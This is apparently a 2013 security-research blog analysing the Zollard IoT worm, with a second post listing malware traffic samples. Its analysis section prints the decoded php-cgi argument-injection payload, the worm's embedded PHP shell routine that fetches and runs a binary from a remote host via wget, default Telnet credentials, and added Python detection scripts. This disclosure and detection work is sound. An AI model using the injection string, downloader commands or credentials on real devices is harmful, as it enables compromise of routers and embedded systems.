Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the references to the files that will be fetched and executed upon successful compromise. The file names indicate several architectures: arm, ppc, mips, mipsel, and x86.
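The decoded POST above is a php-cgi argument injection: everything after the "?" is handed to php-cgi as command-line argv, and the `-d` directives (notably `auto_prepend_file=php://input`) make it execute the POST body. The attacker hides "on", ".", "functions" and "t" behind %6F, %2E, %6E and %74 so that naive substring matches on the raw request miss it. The detector below is an added example written for this post, not code from the original page or from any project it names: it percent-decodes the query, recognises the argv form, reports which php.ini directives the request tries to set, and flags the Zollard User-Agent. The two log entries are constructed (the first rebuilds the decoded POST as it would appear on the wire, the second is an ordinary request that must not be flagged).

```python
"""Detect php-cgi argument injection (as in the Zollard POST) in request lines.

Added example for this post; not code from the original page.
"""
import re
from urllib.parse import unquote_plus

# php.ini directives seen injected in the captured request. Setting them via
# argv is what turns php-cgi into a remote shell (auto_prepend_file=php://input
# executes the POST body), so any of them in a query string is high risk.
HIGH_RISK_DIRECTIVES = {
    "allow_url_include",
    "auto_prepend_file",
    "safe_mode",
    "disable_functions",
    "open_basedir",
    "cgi.force_redirect",
    "cgi.redirect_status_env",
    "suhosin.simulation",
}

DIRECTIVE_RE = re.compile(r"-d\s+([A-Za-z0-9_.]+)=(\S*)")


def decode_query(raw_query: str) -> str:
    """Decode '+' and %XX escapes; decode a second time if escapes survive."""
    decoded = unquote_plus(raw_query)
    if "%" in decoded:
        decoded = unquote_plus(decoded)
    return decoded


def analyze_request(request_line: str, user_agent: str = "") -> dict:
    """Inspect one request line ('METHOD target HTTP/x.y') plus its User-Agent.

    Returns the request path, whether the query looks like php-cgi argv
    injection, every '-d name=value' directive found, the high-risk subset,
    and whether the Zollard User-Agent was present.
    """
    result = {
        "path": "",
        "php_cgi_injection": False,
        "directives": {},
        "high_risk": [],
        "zollard_ua": user_agent.strip() == "Zollard",
    }
    parts = request_line.split()
    if len(parts) < 2:
        return result
    path, _, raw_query = parts[1].partition("?")
    result["path"] = path
    query = decode_query(raw_query)
    # A decoded query beginning with '-' is argv for php-cgi, not a GET string.
    if query.startswith("-"):
        result["php_cgi_injection"] = True
    for name, value in DIRECTIVE_RE.findall(query):
        result["directives"][name] = value
        if name in HIGH_RISK_DIRECTIVES:
            result["high_risk"].append(name)
    return result


def scan_log(entries):
    """entries: iterable of (request_line, user_agent). Yields flagged findings."""
    for request_line, user_agent in entries:
        finding = analyze_request(request_line, user_agent)
        if finding["php_cgi_injection"] or finding["zollard_ua"]:
            yield finding


# Constructed sample entries (not captured traffic). The first is the decoded
# POST from the post rebuilt in wire form, with '=' encoded as %3D and the
# same %6F/%2E/%6E/%74 obfuscation; the second is a benign request.
SAMPLE_ENTRIES = [
    ("POST /cgi-bin/php?-d+allow_url_include%3D%6Fn+-d+safe_mode%3Doff"
     "+-d+suhosin%2Esimulation%3Don+-d+disable_fu%6Ections%3D%22%22"
     "+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput"
     "+-d+cgi.force_redirec%74%3D0+-d+cgi.redirect_status_env%3D0+-n HTTP/1.1",
     "Zollard"),
    ("GET /index.php?page=about HTTP/1.1", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_ENTRIES):
        print(hit["path"], sorted(hit["high_risk"]), "zollard_ua=%s" % hit["zollard_ua"])
```

Decoding before matching is the point: the same detector applied to the raw line would see `allow_url_include%3D%6Fn` and miss it. The second decode pass catches double-encoded variants, which a simple `%3D` match would also miss.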

All files were fetched, and the x86 file was sandboxed on a Linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455. The Linux malware also opened a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies, including 0x010005, 0x01010006, or 0x01020006.

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58455. Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".
Weak or non-existent passwords allow for a successful Telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from the 'arm' file (first dump above) and the 'mips' file (second dump above)

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from the 'mipsel' file (third dump above) and the 'ppc' file (fourth dump above)
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from the 'x86' file (dump above)

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend blocking IP address 78.39.232.113 and ensuring that all Internet-facing devices, yes "devices", are strongly secured.
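The strings dumps and the sandbox run above give three host-side indicators that are easy to check: a listener on TCP port 58455, the drop directory /var/run/.zollard/ with its per-architecture binaries (and /tmp/x86 from the wget command), and the malware's own `iptables -A INPUT -p tcp --dport 23 -j DROP` rule that closes Telnet behind it. The script below is an added example written for this post, not code from the original page; it parses /proc/net/tcp and iptables-save text so the checks can be run on constructed input (shown) or on a live Linux host via check_live_host(). The sample /proc/net/tcp and iptables-save contents are constructed.

```python
"""Host-side check for the Zollard indicators described in this post.

Added example; not code from the original post. Pure functions take the
text of /proc/net/tcp and iptables-save so they run offline on sample data.
"""
import os
import subprocess

ZOLLARD_PORT = 58455  # peer scanner/listener port observed in the sandbox
ZOLLARD_PATHS = [     # paths taken from the strings dumps above
    "/var/run/.zollard/",
    "/var/run/.zollard/arm",
    "/var/run/.zollard/ppc",
    "/var/run/.zollard/mips",
    "/var/run/.zollard/mipsel",
    "/tmp/x86",
]


def listening_ports(proc_net_tcp: str) -> set:
    """Return the set of TCP ports in LISTEN state (st == 0A) from /proc/net/tcp text."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == "0A":
            ports.add(int(local_addr.split(":")[1], 16))  # port is hex after ':'
    return ports


def telnet_drop_rules(iptables_save: str) -> list:
    """Return iptables-save lines that DROP inbound TCP port 23."""
    hits = []
    for line in iptables_save.splitlines():
        tokens = line.split()
        if "INPUT" in tokens and "--dport" in tokens and "DROP" in tokens:
            if tokens[tokens.index("--dport") + 1] == "23":
                hits.append(line.strip())
    return hits


def check_host(proc_net_tcp: str, iptables_save: str, present_paths) -> list:
    """Combine the three checks into a list of findings (empty list = nothing found)."""
    findings = []
    if ZOLLARD_PORT in listening_ports(proc_net_tcp):
        findings.append("listener on tcp/%d (Zollard peer port)" % ZOLLARD_PORT)
    for rule in telnet_drop_rules(iptables_save):
        findings.append("telnet blocked by firewall rule: %s" % rule)
    for path in ZOLLARD_PATHS:
        if path in present_paths:
            findings.append("malware artifact present: %s" % path)
    return findings


def check_live_host() -> list:
    """Run the checks on the local Linux host (iptables-save needs root)."""
    with open("/proc/net/tcp") as fh:
        tcp = fh.read()
    try:
        ipt = subprocess.run(["iptables-save"], capture_output=True, text=True).stdout
    except OSError:
        ipt = ""
    present = {p for p in ZOLLARD_PATHS if os.path.exists(p)}
    return check_host(tcp, ipt, present)


# Constructed sample input resembling an infected host: sshd on tcp/22 (0x0016),
# the malware listener on tcp/58455 (0xE457), one established connection that
# must not count as a listener, and the telnet DROP rule.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0 100 0 0 10 0
   1: 00000000:E457 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10002 1 0 100 0 0 10 0
   2: 0100007F:E457 0100007F:A1B2 01 00000000:00000000 00:00000000 00000000     0        0 10003 1 0 100 0 0 10 0
"""
SAMPLE_IPTABLES_SAVE = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
COMMIT
"""
SAMPLE_PRESENT_PATHS = {"/var/run/.zollard/", "/var/run/.zollard/mipsel"}

if __name__ == "__main__":
    for finding in check_host(SAMPLE_PROC_NET_TCP, SAMPLE_IPTABLES_SAVE, SAMPLE_PRESENT_PATHS):
        print(finding)
```

The Telnet DROP rule deserves the same weight as the listener: a home router or embedded device that suddenly refuses Telnet while its owner never configured a firewall is exactly the after-effect the strings dump describes, and it is visible from the network side as well.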

Friday, August 9, 2013

List of malware pcaps, samples, and indicators for the Library of Malware Traffic Patterns

The library of malware traffic patterns has been popular. We have found it very useful ourselves as well, and we encourage you to send your contributions. I know that at some point the spreadsheet will become unwieldy, but I personally find it the easiest way to work with (easy to sort, search, etc.).

Currently, most of the samples described have the corresponding samples and pcaps available for download (email Mila @contagio for the password), such as you see in the links below:
http://bit.ly/crimesamples | http://bit.ly/crimepcaps
http://bit.ly/aptsamples | http://bit.ly/aptpcaps


Email us at mila [a t ] Deependresearch.org or adimino [a t] deependresearch.org


The current list of malware described (as of Aug. 9, 2013)


#  | APT                                               | CRIME and HACKTIVISM
1  | 9002                                              | Adware Hotbar
   |                                                   | Alina POS v5.3-6
2  | 9002 POST                                         | Andromeda
3  | Banechant 1                                       | ArcomRat / Dokstormac
4  | Banechant payload dl 2                            | Ardamax keylogger
5  | Beebus                                            | Asprox Checkin
6  | Beebus C2 checkin                                 | Asprox GET list of C2s
7  | Beebus data send                                  | Asprox GETs spam template
8  | Comfoo / Vinself / Mspub                          | Avatar Rootkit
9  | Cookies / Cookiebag / Dalbot                      | Beebone downloader
10 | Coswid                                            | Bitcoinminer
11 | CVE-2012-0754 SWF in DOC                          | Blackhole 2
12 | CVE-2012-0779                                     | Blackhole v2
13 | Depyot                                            | Blazebot
14 | Destory Rat / Sogu / Thoper                       | Carberp
15 | Disttrack / Shamoon                               | Citadel
16 | DNSWatch / Protux                                 | Cutwail / Pushdo
17 | Downloader BMP                                    | Darkmegi
18 | Einstein                                          | Darkness DDos v8g
19 | Einstein data send                                | DirtJumper DDoS
20 | Enfal / Lurid                                     | DNSChanger
21 | Favorites                                         | EK - Blackhole 2 landing
22 | Foxy                                              | EK Blackhole 1
23 | Foxy Checkin                                      | EK Neutrino
24 | Gh0st                                             | EK Phoenix
   |                                                   | EK Popads
25 | Gh0st ASP ver                                     | FakeAV var (via Kuluoz - Asprox botnet)
26 | Gh0st PHP ver                                     | Flashback OSX
27 | Gh0st v2000 var                                   | GameThief
28 | Gh0st var                                         | Gapz C&C request
29 | Glasses                                           | Guntior - CN bootkit
30 | GoogleAdC2                                        | Gypthoy
31 | GoogleAdC2 2nd stage                              | Hiloti
32 | Googles                                           | HOIC DDoS
33 | Greencat                                          | Horst Proxy
34 | Gtalk                                             | Imaut
35 | Hangover Smackdown Minapro                        | IRCbot
36 | Hupigon / Graybird                                | JBOSS worm
37 | icon.js - system info send                        | Karagany Loader
38 | IEXPLORE Rat / C0D0S0 / Briba / Cimuz / SharkyRAT | Kuluoz.B downloader
39 | IXESHE                                            | Matsnu - MBR wiping ransomware
40 | IXESHE AES                                        | Medfos
41 | KoreanBanker DL                                   | Money loader
42 | Letsgo / TabMsgSQL                                | Mutopy Downloader
43 | Letsgo / TabMsgSQL downloader                     | Mutopy Downloader initial callback
44 | Likseput                                          | PassAlert
45 | Lingbo (?)                                        | Pony loader
46 | Luckycat - WIMMIE                                 | PowerLoader
47 | LURK                                              | Ranbyus / Triton (Spy, Banking, smart cards)
48 | Mediana Proxy                                     | Reedum
49 | MiniASP                                           | Shiz / Rohimafo DDoS
50 | Miniduke                                          | Srizbi
51 | Miniflame                                         | Stabuniq
52 | Mirage                                            | Sweet Orange EK
53 | Mirage - later var                                | Symmi Remote File Injector
54 | Mongal                                            | Tbot tor
55 | MSWab / Yayih                                     | Tinba aka Zusy
56 | Murcy                                             | Urausy (Ransomware)
57 | Netravler                                         | USteal.D
58 | NfLog                                             | Vobfus
59 | NTESSESS                                          | Xpaj
60 | Pitty Tiger                                       | ZeroAccess / Sirefef
61 | Plugx                                             | ZeroAccess / Sirefef - Counter site checkin
62 | PNG trojan                                        | ZeroAccess / Sirefef ppc fraud - redirect
63 | Poison Ivy                                        | Zeus
64 | Quarian                                           | Zeus Gameover
65 | RedOctober AuthInfo                               |
66 | RedOctober Sysinfo                                |
67 | RegSubDat                                         |
68 | RssFeeder                                         |
69 | Sanny / Win32.Daws                                |
70 | Seasalt                                           |
71 | Sofacy                                            |
72 | Surtr 2nd Stage DL                                |
73 | Surtr Initial GET                                 |
74 | Swami                                             |
75 | Sykipot / Wyksol                                  |
76 | Taidoor                                           |
77 | Taleret                                           |
